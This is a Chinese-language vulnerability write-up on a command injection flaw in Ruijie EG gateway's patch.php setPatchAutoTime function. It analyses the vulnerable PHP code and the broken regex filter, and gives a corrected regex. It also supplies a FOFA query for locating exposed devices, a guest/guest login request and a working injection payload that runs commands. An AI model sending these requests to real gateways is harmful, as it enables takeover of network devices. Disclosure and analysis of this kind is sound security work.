锐捷-EWEB patch.php 命令注入漏洞


漏洞简介

锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。锐捷EG易网关 patch.php 的 setPatchAutoTime存在命令注入漏洞,攻击者可以利用该漏洞在设备上执行任意命令,造成设备失陷等高危风险。

影响版本

<=2022.07.28.01

fofa语法

title="锐捷网络-EWEB网管系统" || app="Ruijie-EG易网关" && body="/login.php?a=version"

漏洞分析

看下 patch.php 关键业务 setPatchAutoTimeAction 逻辑的实现

public function setPatchAutoTimeAction(){
    $pram = p("pram");
    $strcmd = json_encode($pram);
    $cmd = "lua /sbin/patch-upgrade/config_patch_upgrade_mode.lua "."'".$strcmd."'";
    $json = self::execShell($cmd,false);
    ajax_echo($json);
}

接收 pram 参数的值经过 json_encode 处理后,直接拼接进 $cmd 命令中,然后调用 execShell 执行,看下 execShell 功能实现

protected  function execShell($cmd,$escapeCmd = true,$isUtf8){
     $timing = microtime(true);
     if($escapeCmd){
        $cmd = EscapeShellCmd($cmd);
     }else{
        $reg='/(\;|\&|\|)+/';
        if (count(preg_split($reg,$cmd)) > 1) {
            $forbidstr = "forbid Special characters!";
            return $forbidstr;
        }
     }
     $str = shell_exec($cmd);
     if ($this->debug) {
         $timing = (int) ((microtime(true) - $timing) * 1000);
         error_log("SHELL:".$cmd."\ntime:".$timing."ms",0);
     }
     if(!$isUtf8){
        $str = iconv('GB2312','UTF-8//IGNORE',$str);
     }
     return $str;
}

根据 $escapeCmd 的布尔值来决定是否使用 EscapeShellCmd 来进行过滤,默认是用它过滤的,但是 setPatchAutoTimeAction 指定 $escapeCmd 为 false ,因此预期使用正则来判断是存在 分号、链接符、竖线 这些命令注入常用字符,但是这个正则在 PHP 里写法是错误的,导致失去判断的作用!因此造成命令注入漏洞。

漏洞复现

获取cookie

POST /ddi/server/login.php HTTP/1.1
Host: ruijieweb.mrxn.net
Content-Type: application/x-www-form-urlencoded

username=guest&password=guest?

命令注入

我们只需要闭合前后的单引号就可以执行命令

或者使用 反引号`

POST /patch.php?a=setPatchAutoTime HTTP/1.1
Host: ruijieweb.mrxn.net
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=xxxxxxxxxxl855hve3xxxxxxxx
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

pram=%20'%3bid%20%23

成功执行 id 命令并回显结果。

反引号命令执行

PS: 正确正则写法 $reg = '/(;|&|\|)+/';


手机扫码阅读

汉塔科技上网行为管理系统 tracert.php 命令注入漏洞

FastJson 畸形Unicode bypass waf、流量检测

评 论